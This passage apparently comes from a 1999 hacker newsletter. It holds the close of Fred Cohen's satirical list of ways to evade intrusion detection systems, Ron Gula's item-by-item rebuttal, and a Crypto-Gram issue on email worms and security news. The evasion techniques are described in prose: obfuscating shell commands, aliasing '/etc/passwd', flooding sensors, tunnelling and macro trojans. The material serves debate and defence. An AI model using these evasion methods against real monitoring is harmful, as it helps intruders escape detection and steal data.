attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t detect many of the common attacks used by attackers today. 49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.) 50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50! Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of known attacks. Afterward: This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content. What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a private email I sent to one of these folks: Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious paper is the national infosec technical baseline, but it apparently engendered no such discussion. When will I learn that people ignore my serious work and pay lots of attention to my play pieces. Summary and Conclusions: I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went back and recounted, and I am pretty sure I have exceeded my goal of 50 ways. If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion, laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I hadn’t told all those decision makers how to ask the tough questions about your product. The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by the acquisition, configuration, or operation costs. I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays. About The Author: Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be reached by sending email to fc@all.net. @HWA 105.0 50 reasons IDS systems work by Ron Gula ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "50 Reasons IDS Systems Work" Comment and review of the article, "50 Ways to Defeat Your Intrusion Detection System" authored by Fred Cohen. By Ron Gula June 1999 Several of our customer's have pointed out an excellent article about weaknesses in intrusion detection by Fred Cohen entitled " 50 Ways to Defeat Your Intrusion Detection System". All fifty ways are included in this paper, but the original version can be downloaded from http://all.net if so desired. In the paper, Mr. Cohen states " . while the idea of intrusion detection systems was an interesting one and one that should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth the effort to implement them. " Mr. Cohen was claiming that intrusion detection was of little use in helping increase or manage network security. The paper then lists 55 techniques that an attacker can use to bypass intrusion detection systems. This article comments on each of the 55 techniques. Many of these techniques are either irrelevant or simply don't work. Almost all of the attacks are techniques that can be deployed with pre-existing system access. A significant percentage of them are techniques one can use to abuse a pre-established Telnet session. Our intent is to educate readers by providing a different perspective of network and computer intrusion detection systems. The 50 Ways: 1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the string '&& true' into a typical shell command line without ill effect on operation but with degraded IDS performance. In general, this is only true if the attack medium can accept extra benign characters. For example, the PHF web attack uses a string of '/cgi-bin/phf'. There aren't any characters that can be prefixed or appended that will cause a web server to still accept the URL. In the above example, if one were to exploit the older AIX 'tprof' get-root, the 'tprof' program would need to be invoked at some point. Any IDS that matched on that word would have a positive match. Very few IDS systems look for complex attacks. They look for the smaller pieces of the attack. 2 - Use tabs instead of spaces in commands. Since most current systems don't interpret all separators in the same way, changing to non-standard separators can make them fail. You might also try ',' instead of ';' in the Unix shell. Same as number one. Using several tabs to run the 'tprof' program still requires 'tprof' to appear in a command line. And that can cause a host or network based IDS to detect the attack. 3 - Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator. This would confuse detection systems almost without exception. This requires modification of the IFS (internal field separator) environment variable. Many host based IDS products alert on modification of this field. Most network based IDS products don't concentrate on these sort of attacks. However, the attacks described in 1,2 and 3 would not effect host-based IDS products such as Tripwire, Stalker and CMDS. 4 - Reorder a detected attack sequence. For example, if the attack goes 'a;b;c' and it would also work as 'b;a;c', most detection systems would rank the one they were not tuned to find as unlikely to be an actual attack. Logically this is an appealing argument, however modern vulnerabilities are usually exploited in one step. These vulnerabilities can be identified by many different IDS products. More complex attacks are also likely to have a few of their individual steps detected by an IDS. 5 - Split a standard attack across more than one user. Using the 'a;b;c' example above, if user X types 'a;b' and user Y types 'c' the attack is almost certain to go undetected. Again, if steps 'a', 'b' or 'c' are required to do an attack, then it is likely that an IDS will pick up on at least one of them, regardless of which user executes it. Using multiple accounts does confuse security operators, but exploits still tend to be detected. 6 - Split a standard attack across multiple sessions. Login once and type 'a;b', logout, then login and type 'c'. Same as #5. Get-root exploit scripts can be multiple lines long, but the bottom line is that they really only do the exploiting on one line. For example, there has to be a command that causes a user to go from a non- privileged user to a super user. 7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type 'a' from site X, 'b' from site Y, and 'c' from site X. Again, same as #5 and #6. The extra traffic may also raise the interest of a network based IDS. And IDS products such as CMDS will notice multiple remote accesses from different locations in a small amount of time. 8 - Define a macro for a command used in a standard attack. For example, set a shell variable called '$ZZ' to 'cp' and then use '$ZZ' instead of 'cp' where appropriate. Adds complexity, but an IDS should be able detect the access. Imagine an IDS that triggers on the 'tprof' program. It will log an event when it is used in a macro assignment. The same is true for methods that redefine a shell variable for the /etc/passwd file. Any IDS that triggers on access to the /etc/passwd file in a Telent session would alert on that event. And again, these techniques do little to stop detection in the face of host based IDS systems such as CMDS, Stalker and Tripwire. 9 - Define a macro for a parameter in a standard attack. For example, use the name '$P' instead of the string '/etc/passwd'. See #8. 10 - Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use for the scripts to the commands and will miss the whole attack. This is the first real technique that is actual possible. Unfortunately, it does not address what happens after the attack has succeeded. Tools such as CMDS will detect login sessions that are out of character. Tripwire will detect any backdoors. Renaming tools such as 'nmap' and 'strobe' is a good idea, but as soon as they are used, a network based IDS will pick them up. ------------------------------------------------------------------------ Bonus attack - Add comments to attack lines in an attack that would otherwise be detected. ------------------------------------------------------------------------ If the attack is referring to a get-root exploit script, then most IDS products are robust enough to detect variations in the attack. This was discussed in 4,5,6 and 7. 11 - Use different commands to do the same function. For example, 'echo *' is almost the same as 'ls' in the Unix shell. One would still need to run 'tprof ' if one were to exploit it. Even if one were to compile a binary program on a different system than simply run the 'trpof' program, many different IDS systems such as Stalker and SeOS would see the unauthorized transition from an unprivileged user to a root user. 12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named 'xxx', try using 'yyy'. This assumes that an IDS is searching for to specific of an exploit. See 11. 13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a filter program - perhaps using 'sed' to do string substitution. See 11. 14 - Encode the attacks in 'ebcdic' and change terminal types to an 'ebcdic' terminal. Since all the characters are differently coded, the detector will be unable to decode your actions. See 11. 15 - Encrypt your attacks - for example, by using the secure shell facilities intended to increase protection by preventing snooping - including snooping by the IDS. This is only true for network based IDS systems. Host based systems have full access to a user's actions under Secure Shell. 16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand the syntax. See 15. 17 - Turn on full duplex communications mode with the target. The extra characters going back and forth may confuse the IDS. Dragon, T-Sight and all versions of the DoD NID program are not vulnerable to this. 18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of the attacks. Or it is more likely to recognize at least one of the attacks. This is very similar to 5, 6 and 7 and is not a new technique. 19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ':'s to '-'s. The bug still needs to be exploited. What happens to the password file after the exploit is interesting, but not directly part of the exploit. 20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS. Same as 15. This is not a new attack. ------------------------------------------------------------------------ Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls. So you might send '15 *.com' and the victim system might do 'dir *.com'. ------------------------------------------------------------------------ Same as 15. This is just a new way of encrypting shell commands. 21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port unable to receive further sensor inputs. Most network based IDS products are deployed securely and many have the ability to implement sensor interfaces without IP stacks. Some of the IDS products, such as Dragon, don't even have any open UDP or TCP ports. RealSecure, NetProwler, and NetRanger also could unbind the IP stack to prevent compromise. 22 - Crash the IDS with ping packets. By sending long PING packets, many systems that run IDS systems can be crashed, causing them to fail to detect subsequent attacks. A second denial of service technique is not a new way to defeat an IDS. Elaborating on 21, most network IDS platforms are stripped down and deployed in a higher state of security than the surrounding network environment. Although, I'm sure there are many network IDS systems running on Windows NT servers that have been deployed out of the box and vulnerable to many DoS and other attacks. 23 - Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the platform is taken over, the IDS can be subverted. How is this different than 22 and 21? 24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might indicate an attack and containing information that makes the attack actions look harmless. SNI wrote an excellent paper on this topic. NFR and Dragon network based IDS systems are not vulnerable to these attacks. And in general, host based IDS products have never been vulnerable to these attacks. 25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected. How can one tell when a passive network IDS has crashed? If the IDS is logging all this data, it will also probably be noticed by someone if they have a clue. The last thing that an attacker wants to do is raise the awareness of network defenders. 26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the system running the IDS may not be able to create the process needed to generate an audit record. This is a localized denial of service attack. Many UNIX operating systems are resistant to these local attacks. Host based IDS products that use single processes are also immune. More likely, if this is a heavily used server, the high number of processes will be noticed by an administrator. 27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked at will. This is my favorite attack described in Mr. Cohen's article. If I understand this correctly, this example tries to use the IDS's automatic blocking of IP addresses against the defended network. Some IDS products such as CMDS, NetRanger, NetProwler and RealSecure can "speak" with firewalls and routers. When certain events occur, the routers and firewalls can be asked to restrict traffic from a particular host. There are some traffic flow problems with this technique, namely firewalls and IDS systems typically work on the perimeter of a defended network. When traffic is restricted, it is inbound traffic. The target host will not be isolated for attack. 28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you. Same as 15. This is just a new way to disguise shell commands. 29 - Type everything in infix notation and have it translated via 'awk' into prefix notation. The IDS may be unable to interpret the traffic. Same as 15. Both 28 and 29 only apply when a network based IDS is watching a Telnet or Rlogin session. These techniques can not be easily replicated on FTP, HTTP, SMTP and many other protocols. 30 - Use 'emacs' as the shell and use wipes and yanks in and out of the 'cmd' buffer instead of typing. The IDS will see things like control-W and control-Y while the command interpreter on the victim site will see malicious commands. NFR and RealSecure detect the use of 'emacs' because anyone who doesn't use 'vi' is obviously a hacker. No seriously, this attack is just another way to hide "in plain sight" over a Telnet or Rlogin session. ------------------------------------------------------------------------ Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch. ------------------------------------------------------------------------ A network based IDS is vulnerable to this. However host based systems aren't. Some network based IDS systems such as NFR and Dragon can even be configured to detect long term low bandwidth network sessions. 31 - Change routes to target to avoid the IDS. This is a valid attack if knowledge of the topology is known before hand. Many times in order to accomplish this, a certain amount of network discovery is required. This mapping can be easily picked up by most network based IDS products. It also requires perfect knowledge of where passive IDS systems are deployed. 32 - Change return routes from target to avoid the IDS. See 31. 33 - Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS. Almost every firewall, router and server drops and logs source routed packets. 31,32 and 33 also assume that there are alternate network paths to target servers when in fact most network IDS systems are deployed as choke points. 34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will miss these packets. Absolutely. We can add even more methods to defeat intrusion detection systems by identifying them and then launching attacks that they do not detect. For example, we may be able to deliver a virus to a Windows NT system protected by Axent IA, BlackICE or even RealSecure. None of those systems detect system level viruses. 35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network- based IDS systems, this is often possible by modifying router traffic (as a simple example). This is a lot like 33. Network based IDS products 'sniff' network traffic. If the traffic isn't there to 'sniff' then there is no intrusion detection. This attack is only valid if the attacker can modify internal network routing and there are other access points for the traffic to flow. Many network IDS products also detect when there are attempts to re-route traffic. 36 - Break into an intermediary to break the trace back of the attack. The intrusion may be detected, but they won't be able to trace it to you (unless they are very good at traces). The original article was entitled "50 Ways to Defeat Your Intrusion Detection System". This method does not defeat detection, only the chance that the ultimate target will figure out exactly who is doing the attacking. One could also argue that the intermediary target is just as likely to detect an attack as the ultimate target. 37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems. This assumes that an attacker already has access to a system on the target network. Brand new attacks don't start this way. There are a wide variety of programs such as NetCat which can be used to open up ports in unusual places. Many of these programs are detected by network IDS products. Some of them, such as RealSecure, even detect LOKI ICMP sessions. 38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encoding for examples). This simply "encrypts" a network communication. It assumes that there is a cooperating system on the target network. 39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content. And if the target network has an IPX based IDS it will pick up the attack accordingly. 40 - Use a different tunneled protocol session for the attack - such as IP over HTML. This is another communication encryption technique. ------------------------------------------------------------------------ Bonus Attack - Define your own protocol for a new application and attack over it. ------------------------------------------------------------------------ See 40. If you have access to a system, write your own encrypted pipe and then communicate with it from someplace else in front of an IDS, this is not defeating the IDS. None of these methods consider all of the poking and prodding that it may take to find the right combination of IP protocol or TCP/UDP source port to bypass a firewall. 41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity. Absolutely. See 34. 42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and people tend to fail under these circumstances. Interesting point, but consider that network management systems are designed to process and present information that could not be understood by any human. IDS systems are the same way. For example with Dragon (shameless product placement) there are a variety of different tools to look at different data at many different levels of abstraction. Tools from companies such as WebTrends tend to present all sorts of security information in a very easy to understand format. And I am of the opinion that the last thing an attack may want to do is put a target on high alert. 43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can't decode the attack inside the macro. See 34. Some products such as RealSecure do look for suspicious JAVA and ActiveX downloads. Proxy firewalls that perform virus checking may also identify this attack. 44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or ... you get the idea. See 43 & 34. This is another example of how these 50 techniques are not 50 unique techniques. 45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you. This is a classic all time attack. Common Trojan Horses can be detected by many host based and network based IDS products. Some firewalls now even recognize Back-Orifice scans. On the other hand, this is one of the most serious problems in computer security today. It is almost impossible to examine binary programs or even source code and predict exactly what the program will do. So, yeah, IDS products can't do this, but it's not a compelling reason to throw away your IDS. Most IDS or firewall products can't discover when you're about to send sensitive corporate information via email either. 46 - Use a rarely used protocol for the attack. Chances are the IDS doesn't know how to interpret the packets. Protocol is not a well defined term. If this is meant as a different UDP/TCP port then the network IDS would need to understand what it is looking for. But this is how most network based IDS products work. They only look for things they understand or can understand to be suspicious. If this attack represents other IP protocols than ICMP, UDP and TCP, then most IDS products can be configured to alert on them. 47 - Recode the attack in a different language than it was originally published in. I don't think this works. Consider the check-cgi program that has been floating around for a few months now and checks for 70+ vulnerable CGI-BIN programs. It has been ported from C to Rebol without any difference at the network layer. This attack only works if the IDS is searching for a specific binary program. Most traditional IDS products don't do this. 48 - Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn't detect many of the common attacks used by attackers today. Yes, but building alarm systems, background checks, cameras, employee training programs and many other systems are available to thwart these techniques. There are even legal techniques to prevent competitors from hiring away key personel. 49 - Attack any system that doesn't run Unix. Since almost all of today's IDS systems only look for Unix attacks, everything else will pass undetected. (Some apparently detect NT attacks now as well.) A quick survey reveals that NetProwler, NFR Flight Jacket, NetRanger, RealSecure, Dragon and BlackICE all detect a multitude of Windows NT attacks. 50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50! Where are these published 1000 attacks? When checking sites like Packetstorm and Rootshell, most of the major attacks are covered by IDS products. There is always an IDS gap where new attacks require new signatures to be developed, but for the most part, published vulnerabilities tend to have IDS products that detect them. ------------------------------------------------------------------------ Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of known attacks. ------------------------------------------------------------------------ See 50-1000+. Conclusion It is very hard to measure intrusion detection systems and network security because the topic is extremely vague and subject to opinion. I hope that this paper will cause some debate and generate some discussion about the role intrusion detection can play in our networks. It should be obvious to the reader that the author truly feels that an IDS can be extremely useful part of a secure network. I do acknowledge that all IDS products could be better and can't save the world, but they should not be discounted so easily. @HWA 106.0 June 15th: Bruce Schneier's Cryptogram ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mailing-List: contact crypto-gram-help@chaparraltree.com; run by ezmlm Precedence: bulk Delivered-To: mailing list crypto-gram@chaparraltree.com Delivered-To: moderator for crypto-gram@chaparraltree.com Received: (qmail 11631 invoked from network); 16 Jun 1999 21:14:32 -0000 Message-Id: <4.1.19990616161311.009ebe60@chaparraltree.com> X-Sender: schneier@counterpane.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 16 Jun 1999 16:14:40 -0500 To: crypto-gram@chaparraltree.com From: Bruce Schneier Subject: CRYPTO-GRAM, June 15, 1999 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" CRYPTO-GRAM June 15, 1999 by Bruce Schneier President Counterpane Systems schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 1999 by Bruce Schneier ** *** ***** ******* *********** ************* In this issue: E-Mail Viruses, Worms, and Trojan Horses Counterpane Systems -- Featured Research News Counterpane Systems News The Doghouse: Shopping.com The Other Doghouse: ChecksNet Hacking Archives on the WWW International Encryption Policy International Encryption Products Comments from Readers ** *** ***** ******* *********** ************* E-Mail Viruses, Worms, and Trojan Horses Looking back from the future, 1999 will have been a pivotal year for malicious software: viruses, worms, and Trojan horses (collectively known as "malware"). It's not more malware; we've already seen thousands. It's not Internet malware; we've seen that before, too. But this is the first year we've seen malware that uses e-mail to propagate over the Internet and tunnel through firewalls. And it's a really big deal. Viruses and worms survive by reproducing on new computers. Before the Internet, computers communicated mostly through floppy disks. Hence, most viruses propagated on floppy disks, and sometimes on computer bulletin board systems (BBSs). There are some obvious effects of floppies as a vector. First, malware propagates slowly. One computer shares a disk with another which shares a disk with five more, and over the course of weeks or months a virus turns into an epidemic. Or maybe someone puts a virus-infected program on a bulletin board, and thousands get infected in a week or two. Second, it's easy to block disk-borne malware. Most anti-virus programs can automatically scan all floppy disks. Malware is blocked at the gate. BBSs can still be a problem, but many computer users are trained never to download software from a BBS. Even so, anti-virus software can automatically scan new files for malware. And third, anti-viral software can easily deal with the problem. It's easy to write software to block malware you know about. You simply have the anti-virus scanner search for bit strings that signify the virus (called a "signature") and then execute the automatic program to delete the virus and restore normalcy. This deletion routine is unique per virus, but it is not hard to develop. Anti-viral software has tens of thousands of signatures, each tuned to a particular virus. Companies release them within a day of learning of a new virus. And as long as viruses propagate slowly, this is good enough. My software automatically updates itself once a month. Until 1999, that was enough. What's new in 1999 is e-mail propagation of malware. These programs -- the Melissa virus and its variants, the Worm.ExploreZip worm and its inevitable variants, etc. -- arrive via e-mail and use e-mail features in modern software to replicate themselves across the network. They mail themselves to people known to the infected host, enticing the recipients to open or run them. They don't propagate over weeks and months; they propagate in seconds. Anti-viral software cannot possibly keep up. And e-mail is everywhere. It runs over Internet connections that block everything else. It tunnels through all firewalls. Everyone uses it. It's easy to point fingers at Microsoft. Melissa uses features in Microsoft Word (and variants use Excel) to automatically e-mail itself to others, and Melissa and Worm.ExploreZip make use of the automatic mail features of Microsoft Outlook. Microsoft is certainly to blame for creating the powerful macro capabilities of Word and Excel, blurring the distinction between executable files (which can be dangerous) and data files (which, before now, were safe). They will be to blame when Outlook 2000, which supports HTML, makes it possible for users to be attacked by HTML-based malware simply by opening an e-mail. Microsoft set the security state-of-the-art back 25 years with DOS, and they have continued that legacy to this day. They certainly have a lot to answer for, but the meta-problem is more subtle. One problem is the permissive nature of the Internet and the computers attached to it. As long as a program has the ability to do anything on the computer it is running on, malware will be incredibly dangerous. Just as firewalls protect different computers on the same network, we're going to need something similar to protect different processes running on the same computer. This cannot be stopped at the firewall. This type of malware tunnels through a firewall using e-mail, and then pops up on the inside and does damage. So far the examples have been mild, but they represent a proof of concept. And the effectiveness of firewalls will diminish as we open up more services (e-mail, Web, etc.), as we add increasingly complex applications on the internal net, and as crackers catch on. This "tunnel-inside-and-play" technique will only get worse. And anti-virus software can't help much. If a virus can infect 1.2 million computers (one estimate of Melissa infections) in the hours before a fix is released, that's a lot of damage. What if the code took pains to hide itself, so that a virus won't be discovered for a couple of days? What if a worm just targeted an individual; it would delete itself off any computer whose userID didn't match a certain reference? How long would it take before that one is discovered? What if it e-mailed a copy of the user's login script (most contain passwords) to an anonymous e-mail box before self-erasing? What if it automatically encrypted outgoing copies of itself with PGP or S/MIME? Or signed itself; signing keys are often left lying around the system. Even a few minutes of thinking about this yields some pretty scary possibilities. It's impossible to push the problem off onto users with "do you trust this message/macro/application" messages. Sure, it's unwise to run executables from strangers, but both Melissa and Worm.ExploreZip arrive pretending to be friends and associates of the recipient. Worm.ExploreZip even replied to real subject lines. Users can't make good security decisions under ideal conditions; they don't stand a chance against a virus capable of social engineering. What we're seeing here is the convergence of several problems: the permissiveness of networks, interconnections between applications on modern operating systems, e-mail as a vector to tunnel through network defenses and as a means to spread extremely rapidly, and the traditional naivete of users. Simple patches won't fix this. There are some interesting technologies on the horizon that try to mimic the body's own immune system to automatically deal with unknown malware, but I am not very optimistic about them. Sure they'll catch some things, but it will always be possible to design malware specifically to defeat the immune systems. A large distributed system that communicates at the speed of light is going to have to accept the reality of viral infections at the speed of light. Unless security is designed into the system from the bottom up, we're constantly going to be fighting a holding action. Melissa: http://www.zdnet.com/zdnn/stories/news/0,4586,2233116,00.html http://www.zdnet.com/zdnn/stories/news/0,4586,2234121,00.html Worm.ExploreZip http://www.zdnet.com/zdnn/stories/news/0,4586,2274306,00.html http://www.wired.com/news/news/politics/story/20160.html http://www.symantec.com/press/1999/n990614d.html ** *** ***** ******* *********** ************* Counterpane Systems -- Featured Research "Protecting Secret Keys with Personal Entropy" C. Ellison, C. Hall, R. Milbert, and B. Schneier, FUTURE GENERATION COMPUTER SYSTEMS, to appear. Conventional encryption technology often requires users to protect a secret key by selecting a password or passphrase. While a good passphrase will only be known to the user, it also has the flaw that it must be remembered exactly in order to recover the secret key. As time passes, the ability to remember the passphrase fades and the user may eventually lose access to the secret key. We propose a scheme whereby a user can protect a secret key using the "personal entropy" in his own life, by encrypting the passphrase using the answers to several personal questions. We designed the scheme so the user can forget answers to a subset of the questions and still recover the secret key, while an attacker must learn the answer to a large subset of the questions in order to recover the secret key. http://www.counterpane.com/personal-entropy.html ** *** ***** ******* *********** ************* News Hushmail is like Hotmail, but encrypted. They implement SSL from the browser to the server, and Blowfish to encrypt messages. Free secure e-mail for the masses. Their source code is available via free download. Furthermore, they developed their product off-shore, so they don't face any export restrictions. I haven't seen any evaluations of the code, but it's certainly a good idea. News story: http://www.wired.com/news/news/email/explode-infobeat/technology/story/19804 .html Hushmail homepage: http://www.hushmail.com Technical summary: https://www.hushmail.com/tech_description.htm Source code: http://www.cypherpunks.ai/~hush/hush-src.103.zip And ZipLip is a competing secure web e-mail service: http://www.techweb.com/wire/story/TWB19990526S0002 I'll write more about both of these products next month. The French data agency CNIL is investigating Microsoft and Intel, to determine if their anti-privacy antics violates any European data protection laws. http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp16en.htm http://www.europa.eu.int/comm/dg15/en/media/dataprot/wpdocs/wp17en.htm A report on how 128-bit crypto was liberated in France. http://jya.com/jospin-coup.htm The United States has been accused using key-escrow to steal secrets. http://www.techweb.com/wire/story/TWB19990518S0004 http://www.nytimes.com/techweb/TW_Report_U_S_Uses_Key_Escrow_To_Steal_Secret s.html How to discuss Blowfish with your children. http://www.hcs.harvard.edu/~demon/issues/apr_26_1999/blowfish/blowfish.html There are rumors that the CIA is using computers to attack the foreign bank accounts of Yugoslav leader Milosevic. http://www.techweb.com/wire/story/reuters/REU19990524S0001 "We've lately had reason to wonder if our nation's cryptography policy is being made by fools. It is a mixed blessing to learn that the people in charge are merely liars." A good editorial. http://www.zdnet.com/pcweek/stories/columns/0,4351,403283,00.html OpenSSL, an open-source toolkit for SSL and TLS, version 0.9.3 has been released. http://www.openssl.org/ Here's a site that provides random primitive and irreducible polynomials, useful for stream-cipher construction. http://www.dmi.ens.fr/~chabaud/Poly/polyform.html U.S. banks are opening a lab to test computer security products. http://www.news.com/News/Item/0,4,36923,00.html The Electronic Telegraph has an interesting feature on the security of safes: how they're made, how they can be attacked. I never realized that safes were rated according to how much insurance you can get on cash contents. http://www.telegraph.co.uk:80/et?ac=000647321007942&rtmo=Q9QwSezR&atmo=99999 999&pg=/et/99/5/13/ecfsafe13.html Good news department: The U.K. has reversed its position on key escrow. Blair's government has dropped a proposal that would have required it. http://www.infoworld.com/cgi-bin/displayStory.pl?990527.icblair.htm Someone wrote an Enigma-machine simulator that runs on an iButton. So you can have an Enigma-machine secret decoder ring. http://www.javaworld.com/jw-08-1998/jw-08-indepth.html The National Security Study Group (some government agency or another) launched a web site (http://www.nssg.gov) to encourage and gather public comment on national security in the 21st century. Be nice and don't hack them for a week or so. http://www.fcw.com/pubs/fcw/1999/0531/fcw-agsitesurv-05-31-99.html Send secret messages in DNA. http://news.bbc.co.uk/hi/english/sci/tech/newsid_365000/365183.stm http://news.excite.com/news/r/990610/02/science-dna-microdot http://www.cnn.com/NATURE/9906/10/top.secret.dna.ap/ CGHQ, the British NSA-equivalent, is moving. Their new site will house 4500 people, and should be completed by 2002. http://www.guardianunlimited.co.uk/Archive/Article/0,4273,3862710,00.html Germany goes on record as being in favor of strong cryptography. It seems they don't trust the U.S. not to spy on them. http://www.wired.com/news/news/politics/story/20023.html ** *** ***** ******* *********** ************* Counterpane Systems News The Black Hat Briefings '99 is a Computer Security Conference scheduled for July 7 and 8 in Las Vegas, Nevada. DefCon is a hackers convention held the weekend after. Bruce Schneier will be speaking at both. http://www.blackhat.com/ http://www.defcon.org/ ** *** ***** ******* *********** ************* The Doghouse: Shopping.com For security-clueless shopping, you can't beat this one: "Shopping.com uses RSA Laboratories commercial encryption suited for U.S. export (RC4-Export, 128 bit with 40 secret). What does that mean to you? RSA protects your sensitive communications over the Internet (such as a credit card number) by transforming the data into an unreadable format. Furthermore, Shopping.com ensures the privacy of the information not only online, but through our back-end systems." Wow. I am in awe. http://www.shopping.com/store/INFO/INFO_SECURE.ASP?nav=|-1|-1|-1|-1|-1&x=cgi -bin ** *** ***** ******* *********** ************* The Other Doghouse: ChecksNet You too can send your bank account name and routing information in the clear over the net. Order your checks from these people. Their Web page clearly states: "ChecksNet protects your personal and bank account information from theft or misuse by encoding and scrambling the data as it is transmitted from this website to us." However, the order form is sent in the clear; they don't use SSL. http://www.checksnet.com/order.htm ** *** ***** ******* *********** ************* Hacking Archives on the WWW There's a lot of hacking information on the WWW, but you have to take the time to look for it. Typing "hacker archive" into AltaVista results in over three million hits. Yahoo's information is much better organized, but there's still a lot of pages to wade through. A great starting site is http://www.infoworld.com/cgi-bin/displayNew.pl?/security/links/security_corn er.htm. These guys write a weekly security column for InfoWorld, and their site is a wealth of useful security links. When I'm looking for something, I usually go there first. The content site I spent the most time at was http://www.genocide2600.com/~tattooman/main.shtml, because it seemed well-organized. Nevertheless, it was clear that this is an archive, not a directory. If you're trying to find a particular hack for a particular piece of software on a particular operating system, expect to spend some time searching. The material is sorted by general category, but the descriptions are limited. On the other hand, if you're looking for write-ups of the latest security holes and exploits, it's neatly sorted by date. For a non-hacker like me, most of this material is way beyond my level of expertise. Still, there's also a fair amount of scary and useful stuff. Just reading through the archive descriptions is enough to make anyone lose faith in any kind of network security. In addition to the vulnerabilities and exploits, there are Windows, Novell, and Unix security tools; password crackers; miscellaneous hacking tools; general utilities; and -- just in case you'd forgotten that hacking was a subculture -- humor archives. There are also links to archives of hacker discussion lists. Other archives include: The Electronic Frontier Foundation "hacker" archive. http://www.eff.org/pub/Net_culture/Hackers/ The archives for 2600 Magazine and for Phrack Magazine. http://www.2600.com http://www.phrack.com And Netscape's hacker page, with links to major hacker sites on the Web. http://excite.netscape.com/computing_and_internet/programming/hacking This last one is the Web page I found most interesting, in the abstract. Hacking has come of age, if Netscape lists the links openly, instead of trying to pretend they don't exist. In general, hackers (at least in their public face) are more interested in penetrating systems and exposing vulnerabilities than in causing damage or stealing money. But most sites are still have legal disclaimers about how the information is only for educational purposes and is not intended to be used to commit the crimes that could be attributed to the information provided. First amendment or not, much of this is a gray area. ** *** ***** ******* *********** ************* International Encryption Policy EPIC has released its "Cryptography & Liberty 1999: An International Survey of Encryption Policy." This is an excellent survey on international encryption policy (it runs about 130 